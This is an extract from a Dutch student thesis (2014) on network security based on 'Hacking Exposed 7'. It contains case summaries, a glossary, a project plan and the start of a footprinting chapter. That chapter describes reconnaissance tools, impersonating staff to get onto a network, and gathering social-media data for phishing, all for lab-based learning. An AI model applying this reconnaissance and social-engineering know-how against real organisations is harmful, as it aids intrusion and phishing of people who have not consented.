Page 19: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

19

2.2 Case 2: Netwerkverkeer afluisteren In case twee wordt besproken hoe je het verkeer in een netwerk kan omleiden via je computer

zonder dat er iemand hier iets van merkt. Hierdoor kan je het netwerkverkeer afluisteren en zo

wachtwoorden, gebruikersnamen en gevoelige informatie over het bedrijf of persoon te weten

komen.

2.2.1 Aanval Om het netwerkverkeer af te luisteren, zijn er twee verschillende aanvallen die dit kunnen doen.

Deze twee aanvallen zijn:

ARP poisoning

MAC flooding

2.2.2 Verdediging Je kan je tegen beide van deze aanvallen verdedigen. Je zal dan verdedigingsmechanismen gebruiken

die je kan instellen in de switch en in de router.

Dynamic ARP inspection

Switchport security

2.3 Case 3: FTP beheren en hacken FTP (File Transfer Protocol)-servers worden in bedrijven vaak gebruikt om bestanden te delen, die

tevens extern kunnen geraadpleegd worden. De taak van een netwerkbeheerder is om de FTP-server

toegankelijk te maken voor werknemers, en tegelijk de veiligheid te bewaren zodat onbevoegde

personen de server niet kunnen binnendringen.

De manier waarop dit gedaan wordt is door bepaalde configuraties te maken waarmee we accounts

verkrijgen, die daarna door bepaalde gebruikers kunnen gebruikt worden en deze te beveiligen met

een wachtwoord.

Vooraleer je een aanval uitvoert, moet je eerst weten achter welk IP-adres zich een FTP-server

bevindt. Je zal dit te weten komen door een TCP/UDP poortscan uit te voeren. Eens je het IP-adres

weet, kan je proberen via anonieme toegang op de FTP server te geraken.

Als anonieme toegang niet werkt, kan je nog altijd een brute-force aanval proberen uit te voeren.

Hierbij zal je vele wachtwoorden en gebruikersnamen uitproberen in een korte tijd. Deze

gebruikersnamen en wachtwoorden zijn diegene die je gevonden hebt tijdens dat je Footprinting aan

het toepassen was.

3 Conclusie Door aan deze bachelor proef te werken heb ik zeer veel kennis opgedaan over netwerkbeveiliging.

Deze kennis zal ik op mijn stage in Salzburg en verder in mijn toekomstige carrière zeker kunnen

gebruiken. Dit was een zeer interessant eindwerk om aan te werken.

Ik hoop dat dit ook een interessante leidraad is voor een netwerkbeheerder of een andere gebruiker.

Page 20: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

20

Page 21: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

21

Lijst met bijlagen

Woordenlijst .......................................................................................................................................... 23

Prince 2TM - Project Initiation Document ............................................................................................... 27

Stap 1: Footprinting ............................................................................................................................... 33

Stap 2: Scanning .................................................................................................................................... 43

Stap 3: Ennumeratie .............................................................................................................................. 63

Stap 4: Hacking Unix .............................................................................................................................. 71

Stap 5: Virtual Private Network ............................................................................................................. 79

Stap 6: Wireless Hacking ....................................................................................................................... 85

Case 1: Scannen en IPS instellen ........................................................................................................... 97

Case 2: Netwerkverkeer afluisteren .................................................................................................... 113

Case 3: FTP beheren en aanvallen ....................................................................................................... 125

Bibliografie .......................................................................................................................................... 137

Timesheets .......................................................................................................................................... 138

Curriculum Vitae Nathan Boone.......................................................................................................... 150

De presentatie ..................................................................................................................................... 153

Page 22: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

22

Page 23: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

23

Woordenlijst Access point: als je connectie maakt met het draadloos netwerk zal je verbinding maken met een

accespoint. Deze acces point zal dan verbonden zijn met het bedraad netwerk.

Accounting: bij accounting wordt alles wat je op het systeem uitvoert, bijgehouden.

Administrator privileges: als je administrator privileges hebt, heb je vele rechten en kan je zo goed als

alles doen op het betreffende toestel. Dit houdt in, programma’s instaleren, wijzigen en verwijderen.

Advanced pakket filtering: advanced pakket filtering is een techniek dat gebruikt wordt door een

Firewall. Hierbij zal er naar de pakketten gekeken worden. Als de pakketten een bepaald soort pakket

zijn dan worden ze niet toegelaten door de firewall.

Authentication: bij authenticatie zal je identiteit gecontroleerd worden.

Authorsisation: bij autorisatie wordt aan de hand van je identiteit beslist welke rechten je krijgt op

het systeem.

Banner: als je connectie maakt met een poort zal er meestal een welkomstbericht of een errorbericht

te zien zijn. Een bericht dat je krijgt bij het connecteren met een poort krijgt, wordt een banner

genoemd.

Broadcast: dit is een bericht dat naar al de toestellen binnen het lokale netwerk gestuurd wordt. Dit

lokale netwerk wordt afgebakend door een router of Virtual Local Area Network (VLAN).

Broncode: broncode is de code waaruit een website is opgebouwd.

Brute-forcen: als je een wachtwoord wil achterhalen, probeer je zoveel mogelijk willekeurige

wachtwoorden uit. Dit doe je meestal aan de hand van een tekstbestand met mogelijke

wachtwoorden die je dan inlaadt in een bepaald programma.

CLI/opdrachtprompt: Command Line Interface, dit is een manier van interactie met een computer op

een tekst gebaseerde manier.

Client: in een client-server model is dit het toestel dat gegevens van de server vraagt.

Cryptographic Transaction Signatures: dit is een protocol dat ervoor zal zorgen dat je je eerst moet

bekendmaken vooraleer er een DNS update kan plaatsvinden. De DNS-server waarvan je de zone

transfer wilt van uitvoeren zal dan je identiteit controleren.

Data-link: dit is de tweede laag uit het OSI-model en zal zorgen voor het transport van data over een

verbinding. De adressering hierbij gebeurt op basis van het MAC-adres.

DHCP server: een DHCP server is een server die dynamisch IP-adressen zal uitdelen aan toestellen in

het netwerk.

Dial-in attack: in veel bedrijven wordt er gebruikt gemaakt van een dail-in methode om van op

afstand voor het bedrijf te werken. Door dit soort van aanval zou je als hacker kunnen binnendringen

in een netwerk.

DNS-server: het netwerk is opgebouwd uit IP-adressen. Om het voor de eindgebruiker gemakkelijk te

maken wordt er gebruik gemaakt van Domain Name Resolving. Dit zal een IP-adres “vertalen” naar

een website naam en omgekeerd. Een DNS-server is dus een server waar de zich de mapping bevindt

tussen de IP-adressen en de namen van de websites.

Page 24: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

24

DOS aanval: dit is een Denial Of Service aanval, dit soort aanval heeft als doel om ervoor te zorgen

dat mensen die normaal iets moeten bereiken op een netwerk dit niet meer kunnen doen. Een

voorbeeld hiervan is als jij naar een website wil gaan en die website is down omdat er een DOS

aanval tegen plaatsvindt. In dit geval zal een persoon zoveel mogelijk connecties proberen te openen

met de webserver zodat deze geen nieuwe connecties meer aankan.

Exploit: dit is een kwetsbaarheid dit gebruikt wordt voor slechte doeleinden.

Firewall: een firewall is een systeem dat een netwerk beveiligd tegen aanvallen van buitenaf.

Gefilterde poort: dit is een poort dat gefilterd is door de firewall. Dit wil zeggen dat de firewall zo

ingesteld is om geen verkeer toe te laten via die bepaalde netwerkpoort.

Gesloten poort: een gesloten poort wil zeggen dat de service dat achter deze netwerkpoort zit niet

aanwezig is.

GUI: Graphical User Interface, dit is een manier van interactie met een computer op een grafische

manier.

Half open connectie: bij zo een connectie is er een deel van de three-way-handshake gedaan maar

niet helemaal. Hierdoor kan er geen verkeer verstuurd worden. Als er veel half-open connecties

openstaan op je toestel kan je ervan uitgaan dat er ofwel een netwerkscan uitgevoerd wordt ofwel

dat er een DOS aanval plaatsvindt.

HINFO: dit laat toe om het hardware type en besturingssysteem van een host bij te houden op een

DNS-server.

Hop: als je naar een website gaat op het internet zal je verschillende routers passeren voor je je

bestemming bereikt. Elke keer als je naar een volgende router gaat doe je een hop. Als gebruiker

merk je hier niets van.

Host: dit is een toestel dat zich bevindt op het netwerk.

HTML: Hyper Text Markup Language. Dit is de opmaaktaal voor websites.

Hub: een hub is een toestel dat al het verkeer dat naar hem gestuurd wordt zal doorsturen op al zijn

fysieke poorten.

IANA: Internet Assigned Numbers Authority, dit is een instantie dat de IP-adressen beheert over heel

de wereld.

Image/IOS: dit is het besturingssysteem van een netwerkapparaat.

Initiator: dit is het toestel dat de verbinding zal starten (initiëren).

Intrusion Detection System: dit is een systeem dat het netwerkverkeer zal analyseren en zo proberen

het verdachte verkeer te melden. Dit systeem zal het verdachte verkeer niet uit het netwerk halen

maar dit systeem zal enkel laten weten dat er verdacht verkeer is.

IP-adres: elk toestel dat verbonden is met het internet heeft een uniek IP-adres, dit is een

cijfercombinatie. Door middel van dit IP-adres kunnen de toestellen onderling communiceren.

ISP: Internet Service Provider, dit is een bedrijf dat ervoor zal zorgen dat de eindgebruikers op het

internet kunnen. Enkele voorbeelden in België zijn: Belgacom en Telenet.

Key: dit is een soort sleutel dat kan gebruikt worden bij het encrypteren van gegevens.

Page 25: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

25

Loggen: het bijhouden van gebeurtenissen die doorgaan op de computer. Dit kan een foutenlog zijn

dat al de fouten die gebeuren op een computer bijhoudt.

Lookup requests: dit is de vraag van een naam voor een bijbehorend IP-adres te weten te komen.

Deze requests zullen afgehandeld worden door een DNS-server.

Metadata: dit is al de data dat zich rond een document bevindt. Enkele voorbeelden zijn de auteur,

de grootte en de datum dat het document aangemaakt is.

Multicast: dit is wanneer je een bericht stuurt over het netwerk naar meerdere van vooraf gekende

toestellen.

Nameblock: een blok aan IP-adressen met hun bijhorende naam in een DNS-server.

Namelookup: het opzoeken van een bijhorend IP-adres in een DNS-server.

Netwerkpoort: elke service die op je computer aanwezig is heeft een bijhorende poort. Als je naar

een website surft, zal je via poort 80 gaan. Dit is de poort van http.

Nonce: dit is een random gegenereerd nummer dat als het doorgestuurd wordt van de initiator naar

de responder ondertekend zal worden. Hierdoor kan de identiteit gewaarborgd woren.

Open poort: dit een poort waarachter zich een service bevindt. Als bijvoorbeeld poort 23 openstaat

dan weet je dat je dat toestel kan bedienen door Telnet te gebruiken.

Pakket: dit is binaire data dat door een computernetwerk gaat. Naargelang het protocol dat gebruikt

wordt zal het pakket een andere vorm en andere eigenschappen hebben.

Patch: als je een toestel patcht zal je een update uitvoeren waardoor de exploit teniet gedaan wordt.

Promicious mode: promicious mode is een toestand waarin je je NIC kan brengen om al het verkeer

dat voorbij komt af te luisteren.

Proxy server: een proxy server is een server waarlangs je kan gaan zodat een derde partij niet aan je

echte IP-adres kan geraken. Deze proxy server zal je een ander IP-adres geven.

Reply: dit is een antwoord, dit volgt meestal op een request.

Request: dit is een vraag, dit gaat meestal voor op een replay.

Responder: dit is het toestel dat zal antwoorden aan de initiator.

Reverse lookups: normaal gezien als je een lookup doet bij een DNS-server zal je vragen om een

naam om te zetten in een IP-adres. Je kan ook een IP-adres geven en wat de bijhorende naam is.

RIR: Regional Internet Register, dit zijn organisaties over heel de wereld dat IP-adressen zullen

uitdelen aan de verschillende ISP’s.

Root access: als je root acces bekomt, heb je toegang tot heel het toestel. Dit wil zeggen dat je alles

kan doen met dat toestel. Een voorbeeld is het jailbreaken van een IPhone.

Router: dit is een toestel dat zich op een network bevindt dat ervoor zal zorgen dat er connectiviteit

mogelijk is tussen verschillende netwerken.

Security association (SA): dit is een groep van beveiligingsmethoden.

Page 26: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

26

Server: dit is een toestel waar een service op staat. Als jij naar een website surft zal je van jouw

computer (client) naar een andere computer (server) surfen. Wat je op je scherm te zien krijgt

download je eigenlijk van die server.

Sessie: een voltooide three-way-handshake.

Shell: een shell is een command prompt interface.

Sniffer: met een sniffer kan je netwerkverkeer afluisteren.

Statefull firewall: een statefull firewall zal onthouden naar welke website je geweest bent en zal

verkeer dat terugkomt van die bepaalde website doorlaten. Op deze manier wordt er geen verkeer

binnengelaten in het netwerk dat je zelf niet eerst gevraagd hebt.

Strings: dit is een opeenvolging van karakters. Je kan een string gebruiken als zoekterm in google om

zo resultaten te krijgen over toestellen dat kwetsbaar zijn.

Subnet mask: met een subnet mask word teen grootte van een netwerk beslist. Als je subnet mask

255.255.255.0 is dan kan je gebruik maken van 255 IP-adressen in je netwerk.

TCP header: een TCP header is een onderdeel van een pakket en bevat meestal de “source IP-adres”

en “destination IP-adres”.

TCP: dit is een soort netwerkpoort.

Three-way-handshake: dit zijn de drie stappen die doorlopen moeten worden voordat er een TCP-

connectie van start gaat.

UDP: dit is een soort netwerkpoort.

Unicast: bij een unicast zal je een bericht sturen aan maar één enkele host.

VLAN: dit is een Virtual Private Network, hiermee kan een broadcastdomein beperken. Je maakt

eigenlijk verschillende LAN’s die je dan later onderling met elkaar kan verbinden.

WHOIS pagina: dit is een pagina om de gegevens van een domeinnaam of IP-adres te achterhalen

door deze te zoeken in een databank.

Page 27: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

27

Prince 2TM - Project Initiation Document

Project Name: Hacking Exposed Release Date

Author:

Callebaut Dries 24/01/2014 Boone Nathan

Owner:

Callebaut Dries Boone Nathan

Client:

iMinds (Van Maele Andy)

Document Number: 001

1 Project Definition Het project houdt in dat de twee teamleden met behulp van de methodiek "Hacking Exposed", dat

nauw aanleunt met het materiaal in het boek "Hacking Exposed 7" door de auteurs Stuart McClure,

Joel Scambray en George Kurtz, een goed begrip hebben van netwerkbedreigingen en de nodige

voorzorgsmaatregelen kunnen treffen om een een klein tot middelgroot netwerk te beveiligen.

De leerstof zal verder behandeld worden door zelfgemaakte cases, waarbij kennis aan te pas komt

die is vergaard door de methodiek te hebben bestudeerd.

2 Background iMinds is een bedrijf, o.l.v. de Vlaamse Overheid, dat veel onderzoek doet naar communiceren, en in

het bijzonder netwerkcommunicatie. Ze zijn benieuwd naar de mogelijkheden van hun "virtual wall",

en stellen dit ter beschikking voor geïnteresseerden. Hierdoor is het mogelijk dat ze projecten

voorstellen, waar studenten hun kennis kunnen testen.

Het project zal de deelnemers voorbereiden om een use case dat voldoet aan de eisen van niveau 6

te maken, wat vereist is om het project tot een goed einde te brengen.

3 Project objectives Netwerkaanvallen begrijpen en bestuderen

In een gecontroleerde testomgeving netwerkbeveiliging toepassen

Als hacker optreden om de zelfgemaakte netwerkbeveiliging te testen, en eventueel daarna

aan te passen

Page 28: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

28

4 Desired outcomes In de eerste plaats zullen de teamleden de leerstof van “Hacking Exposed” begrijpen, zodat ze een

goede basis hebben om met de cases te beginnen.

Vervolgens zullen de teamleden de verschillende cases met succes afronden, en al hun bevindingen

noteren. Deze ervaring zal hun helpen bij toekomstige projecten en situaties.

Uiteindelijk zullen de resultaten van de cases enerzijds het succesvol infiltreren van een niet

beschermd netwerk zijn, en anderzijds het beveiligen van het netwerk zodat verdere pogingen tot

infiltreren mislukken.

5 Project scope and exclusions De volgende delen en hoofdstukken, zijn delen en hoofdstukken uit het boek “Hacking Exposed 7”.

In scope Out of scope Boek Hacking Exposed 7 bestuderen Een samenvatting van het boek

3 cases uitwerken omtrent netwerkbeveiliging

Deel 2 Hoofdstuk 4

Relevante leerstof en andere items noteren Deel 2 Hoofdstuk 6

Deel 1 Deel 3 Hoofdstuk 7 (alles buiten VPN)

Deel 2 Hoofdstuk 5 Deel 3 Hoofdstuk 9

Deel 3 Hoofdstuk 7 VPN Deel 4

Deel 3 Hoofdstuk 8

6 Constraints and assumptions Om de kwaliteit van het project te garanderen wordt er na elk doorgenomen hoofdstuk een

document gemaakt met daarin de meest interessante onderdelen.

Het domein dat de methode “Hacking Exposed” omvat is te breed. We zullen dus 5 cases bedenken

en hiervan zullen we er 3 uitwerken.

De einddatum is het einde van het eerste semester van het derde jaar Toegepaste Informatica

7 The user(s) and any other known interested parties Hogeschool Universiteit Brussel

De heer Andy Van Maele: opdrachtgever

De heer Yvan Rooseleer: opleidingshoofd

Serge Van Cleynenbreugel: Mentor

Dries Callebaut: student

Nathan Boone: student

Page 29: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

29

8 Interfaces Voor we konden beginnen aan ons project was het noodzakelijk om het boek Hacking Exposed 7 in

ons bezit te hebben.

Voor de cases werd er een gecontroleerde testomgeving gecreëerd met behulp van

netwerkmateriaal behorende tot de Hogeschool Universiteit Brussel. Tot dit materiaal behoren

routers, switches, bijhorende kabels en het schoolnetwerk.

9 Project Approach Om ons project tot een goed einde te brengen hebben we fasering gebruikt.

• Fase 1: boek Hacking Exposed 7 onderzoeken en bestuderen, waarna belangrijke en

interessante delen genoteerd worden.

• Fase 2: 5 cases bedenken

• Fase 3: 3 cases uitwerken

10 Project Management Team Structure

Andy Van Maele

Opdrachtgever

Nathan Boone

Projectleider

Dries Callebaut

Projectleider

Gert Van CauwenbeghProjectbegeleider

Yvan Rooseleer

Projectbegeleider

Serge Van Cleynenbreugel

Project mentor

Page 30: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

30

11 Role Descriptions Opdrachtgever: Andy Van Maele

Projectleider(s): Dries Callebaut en Nathan Boone

Mentor: Serge Van Cleynenbreugel

Project begeleider(s): Yvan Rooseleer en Gert Van Cauwenbergh

R: Responsible (verantwoordelijk)

A: Accountable (eindverantwoordelijk)

C: Consulted (geraadpleegd)

I: Informed (geinformeerd)

O: Out of loop (niet betrokken)

RACI-chart Opdrachtgever Projectleider Mentor Project begeleider

Cases maken I R A I I

Cases goedkeuren R A I I

PID maken O R A I I

PID goedkeuren O A R R

Project opvolgen O I R A

Leveren eindresultaat A R I I

12 Quality Management Strategy We zullen de kwaliteit van ons project garanderen door:

• Na elke stap uit de methodiek “Hacking Exposed” bestudeerd te hebben een document

opmaken waarin de belangrijkste zaken beschreven en uitgelegd staan.

• Verder zullen er op willekeurige momenten worden gevraagd aan de projectbegeleiders

om de huidige staat van de documentatie goed te keuren.

• Er worden 3 cases opgesteld, waarna deze voorgesteld worden aan de opdrachtgever om

de meest toepasselijke cases te vinden. Pas daarna voeren we de cases effectief uit. Dit

heeft als gevolg dat elke case over voldoende uitdagingen beschikt, maar tegelijkertijd

niet te moeilijk wordt.

• De versies van de projectdocumentatie worden individueel bijgehouden en individueel

voorzien van naamgeving.

Page 31: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

31

13 Configuration Management Strategy • Het geheel van de documenten wordt gedeeld via Skydrive (https://skydrive.live.com/).

De gekozen teksteditor is Microsoft Word.

• Elke projectdeelnemer beheert over rechten om de documenten aan te passen en te

verwijderen.

• Versiebeheer wordt geregeld via manuele classificatie, waarbij de datum telkens wordt

meegedeeld samen met de naam van de editor.

• Wat we bespreken in de documenten zal via spontane vergaderingen worden beslist,

alsook tijdens de lessen "IT-project".

• Er zal een eenmalige vergadering gebeuren om de kwaliteit van de 5 cases te bespreken,

waarbij een scoringscriterium aan te pas komt en 3 cases uiteindelijk gekozen worden.

14 Risk Management Strategy Enkele risico’s verbonden aan ons project:

Risico Kans (max 10)

Impact (max 10)

Totaal (max 100)

Niet behalen deadline 5 8 40

Onvoldoende fysiek materiaal voor uitvoering cases

2 7 14

Verliezen van documenten 1 9 9

15 Communication Management Strategy De twee teamleden hebben allebei de verantwoordelijkheid om als team de projectmentor te

contacteren voor minstens één afspraak.

De communicatie gebeurt eenmaal per maand op een dag dat afgesproken wordt op de vorige

vergadering. De eerste vergadering zal gebeuren om de gevonden cases en voortgang van het project

te bespreken.

De informatie dat we bijhouden zijn de datums van de vergaderingen, samen met de afgesproken

punten. Analyse van stakeholders zal het eerste punt zijn dat zal besproken worden.

In het geval van vergadering met een derde persoon zal er telkens één noteerder zijn, terwijl het

andere teamlid de communicatie regelt. De middelen die worden gebruikt zijn pen en papier, of een

laptop indien aanwezig. De technieken die worden gebruikt richten zich op het snel en duidelijk

informeren tegenover de contactpersoon, zodat feedback vlot kan verlopen. Na elke vergadering

zullen de nota's overlopen worden door de teamleden, om te kijken of er niets over het hoofd is

gezien.

Page 32: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

32

16 Project Plan Het project verloopt in drie fasen:

Fase 1: methodiek “Hacking Exposed 7” bestuderen

De methodiek “Hacking Exposed 7” zoals bestaat uit 4 grote stappen waarvan we 3 gaan bespreken.

Stap 1 Casing the Establishment

Footprinting: Het binnenbreken in een bedrijf om informatie te vergaren, samen met de

voorzorgsmaatregelen.

Enumeration: IP-adressen die gebruikt kunnen worden, poorten die openstaan, etc.. gebruiken om

zwaktes te vinden en analyseren.

Stap 2 Endpoint and Server Hacking

Hacking UNIX: Het uitvoeren van enkele technieken om FTP servers te hacken, samen met de

bijpassende verdedigingen.

Stap 3 Infrastructure Hacking

Twee soorten hacking worden hier besproken: VPN en Wireless Hacking. Ook hier worden

veiligheidsmaatregelen besproken.

Wij zullen stappen 1, 2 en 3 bestuderen en documenteren. We zullen dit doen door gebruik te maken

van Word documenten die gedeeld worden op Skydrive.

Fase 2: cases bedenken Als we het boek goed doorgenomen hebben zullen we cases bedenken. Deze cases zijn er zodat we

kunnen testen dat we de vergaarde informatie ook wel degelijk kunnen gebruiken.

We zullen de cases opmaken en dan aan elke case een score geven. De case met de hoogste waarde

zullen we als eerste maken.

Fase 3: cases uitwerken Als al de cases bedacht zijn en als er een score aan gegeven is kunnen we beginnen met de cases uit

te werken. Hiervoor zullen we als bron onze opgedane kennis uit het boek Hacking Exposed 7

gebruiken.

17 Project Controls Na elke fase die gedefiniëerd staat in “Project Plan” zullen we een deliverable maken.

Fase 1 Na elk hoofdstuk zal er een word document gemaakt worden met onderdelen die kunnen helpen

met het beter begrijpen van de methode "Hacking Exposed" uit het boek.

Fase 2 We zullen werken met een scoringscriterium. Door dit te gebruiken geven we elke case een waarde

van 1 tot 10, waarbij 1 het minst haalbare en 10 het meest haalbare. Dit gebeurt onder leiding van de

opdrachtgever.

Fase 3

De gekozen 3 cases zullen uitgewerkt worden in een virtuele en/of fysieke omgeving.

Page 33: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

33

Stap 1: Footprinting 1 Inleiding Je kan niet zomaar ergens binnenbreken en beginnen te hacken, want dit zou tot weinig succes leiden.

Daarom is er een eerste stap, deze stap is het in kaart brengen van de onderneming of de persoon bij

wie je wilt inbreken. Als je wil inbreken in een huis moet je zeker ook eerst de omgeving analyseren

voor je zal kunnen toeslaan, anders zal je heel veel getuigen hebben, en aanwijzingen achterlaten. Dit

laatste is bij hacking het allerbelangrijkste, maar ook het moeilijkste. Iedereen kan hacken, maar de

persoon die geen sporen achterlaat is de beste hacker.

Terwijl je je opzoekingswerk aan het doen bent naar de persoon of onderneming in kwestie, is het

belangrijk dat je geen sporen achterlaat. Dit om te voorkomen dat ze weten dat er een aanval zal

plaatsvinden. Ze kunnen dan ook geen voorzorgsmaatregelen nemen tegen de bepaalde aanval die jij

wilt plegen.

2 Openbaar beschikbare informatie

2.1 Inleiding Er zijn verschillende manieren om meer te weten te komen over een bedrijf of een individu. Bij de ene

manier laat dit al meer sporen achter dan bij de andere. Hieronder zal ik verschillende manieren

bespreken.

2.2 Website

2.2.1 Commentaar Zo goed als elk bedrijf waarbij je zou kunnen binnenbreken heeft een website. Op deze website vind

je veel nuttige informatie. Je zal deze informatie niet meteen vinden als je de website bezoekt maar

wel als je naar de broncode kijkt. In deze broncode zal je soms commentaar terugvinden, in deze

commentaar zijn er meestal nuttige zaken verstopt. Enkele zaken die je in de commentaar zou kunnen

terugvinden zijn gegevens over wie de website gemaakt heeft, en andere zaken die de programmeur

er als geheugensteuntjes ingestoken heeft.

Je kan dit het beste doen door de gehele website te downloaden en hier dan in te zoeken naar de

commentaar (tags). In HTML= “<!-- -->”, in javascript= “//”.

UNIX/Linux: Wget (gnu.org/software/wget/wget.html) gratis

Windows: Teleport Pro (tenmax.com) betalend

2.2.2 Web Application Brute Forcing In de broncode van websites vind je soms ook verborgen mappen en bestanden. Het is moeilijk om

deze zaken terug te vinden met het blote oog dus bestaat hier software voor. DirBuster van owasp is

de software die we zullen gebruiken.

Je zal de website die je wilt brute-forcen moeten selecteren. Dan zal je een document moeten kiezen

met mogelijke verborgen mappen of bestanden en dan zal DirBuster de website scannen.

Deze manier van brute-force laat veel sporen achter, er is dus ook een ingebouwde functie om een

proxy in te stellen.

Windows, UNIX/Linux: DirBuster (owasp.org/index.php/Category:OWASP_DirBuster_Project)

Page 34: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

34

2.3 Google Maps Je kan de exacte positie van een bedrijf te weten komen door dit bedrijf op te zoeken via Google Maps.

Zo achterhaal je de fysieke locatie.

Als je de fysieke locatie kent, kan je ter plaatse gaan en daar onderzoek doen naar het draadloos

netwerk. Je kan bijvoorbeeld onderzoeken hoe dat netwerk beveiligd is. Je kan ook proberen je voor

te doen als een medewerker of bezoeker en zo meer te weten komen over het bedrijf. Als ze je toelaten

in een vergaderzaal en als er daar netwerkaansluitingen ter beschikking zijn, kan je via deze weg op

het netwerk proberen te geraken.

2.4 Social Engineering Om meer te achterhalen over het bedrijf of een individu, kan je gebruik maken van “social

engineering”. Dit betekent dat je de vele sociale netwerksites kan aflopen en zoeken naar de

betreffende onderneming of persoon. Enkel sites die je kan bezoeken:

- Facebook.com

- Myspace.com

- Reunion.com

- Classmates.com

- Twitter.com

- Linkedin.com

- Plaxo.com

- Monster.com

- Careerbuilder.com

- Dice.com

- Ancestry.com

- Flickr.com

- Photobucket.com

De gegevens die je hiermee vindt, kunnen gebruikt worden bij het versturen van “phishing mails”. Dit

zijn persoonlijke mails met kwaadaardige links.

2.5 Google Hacking Database (GHDB) Google is een zoekrobot waar zeer veel informatie te vinden is. Er bestaan verschillende

zoekopdrachten waarmee je wachtwoorden kan achterhalen en foutief ingestelde servers kan

terugvinden. Deze zoekopdrachten zijn te vinden op de GHDB.

Windows, UNIX/Linux: http://www.hackersforcharity.org/ghdb

2.5.1 SiteDigger SiteDigger is een programma waarmee je het internet automatisch kan laten doorzoeken met strings.

Deze strings zijn te vinden in bovenstaande Google Hacking Database. Je kan ook een specifiek domein

of een specifieke site kiezen.

Windows, UNIX/Linux: http://www.mcafee.com/apps/free-

tools/termsofuse.aspx?url=/us/downloads/free-tools/sitedigger.aspx

Page 35: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

35

2.6 FOCA 3.2 Foca is een programma waarmee je de metadata van een bestand kan analyseren. Je kan hiermee veel

te weten komen over de persoon die het document gemaakt heeft en over de programma’s die

gebruikt zijn om het document te maken. Door het programma FOCA3.2 zelf uit te testen heb ik

vastgesteld dat je er veel meer mee kan doen dan in het boek Hacking Exposed 7 beschreven staat. Zie

de screenshot hieronder voor meer informatie.

Figuur 2-1 FOCA 3.2 Metadata

Windows, UNIX/Linux: http://www.informatica64.com/foca.aspx

2.7 Shodanhq Shodanhq is een zoekmachine om te zoeken naar toestellen, gaande van thuisrouters tot grote

systemen die met het netwerk verbonden zijn.

Windows, UNIX/Linux: www.shodanhq.com

2.8 Forums Door te zoeken naar foute configuraties op Google of op forums, kan je veel te weten komen over

bedrijven. Het is mogelijk dat een netwerkbeheerder met een firewall aan het sukkelen is en om een

oplossing te vinden voor zijn probleem, de hele configuratie op het internet zet, zodat andere personen

hem kunnen helpen om fouten te vinden. Deze configuratie kan gevoelige gegevens bevatten, o.a. IP-

adressen, namen van gebruikers, enz.

2.9 Openbaar beschikbare informatie Tegenmaatregels Het is belangrijk dat je waar mogelijk informatie probeert te beperken. Dit is echter niet

gemakkelijk. Eens de informatie op het internet werd gezet, is het moeilijk om deze informatie weg te

halen. Wat je wel kan doen is de informatie aanpassen of valse informatie gebruiken zodat de

geïnteresseerden moeilijk de juiste gegevens vinden.

Page 36: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

36

3 WHOIS and DNS Enumeration WHOIS is een manier om een IP-adres te traceren. Je kan dit IP-adres traceren tot bij de Internet Serivce

Provider (ISP) die het IP-adres uitgedeeld heeft. Eerst en vooral moet je beginnen bij Internet Assigned

Numbers Authority (IANA), dit is de internationale verdeler van IP-adressen. IANA zal deze IP-adressen

dan doorgeven en verdelen aan een bepaalde Regionale Internet Registers (RIR). Een RIR zal op haar

beurt de IP-adressen verder onderverdelen naar grote bedrijven en ISP’s. Als je op IANA naar een IP-

adres zoekt, dan zal je doorverwezen worden naar de WHOIS pagina van de RIR die het IP-adres

uitgedeeld heeft. Als je op de WHOIS pagina van deze RIR verder gaat zoeken zal je meer informatie

krijgen over het IP-adres. Je zal te weten komen wie dit IP-adres uitgedeeld heeft en je zult een

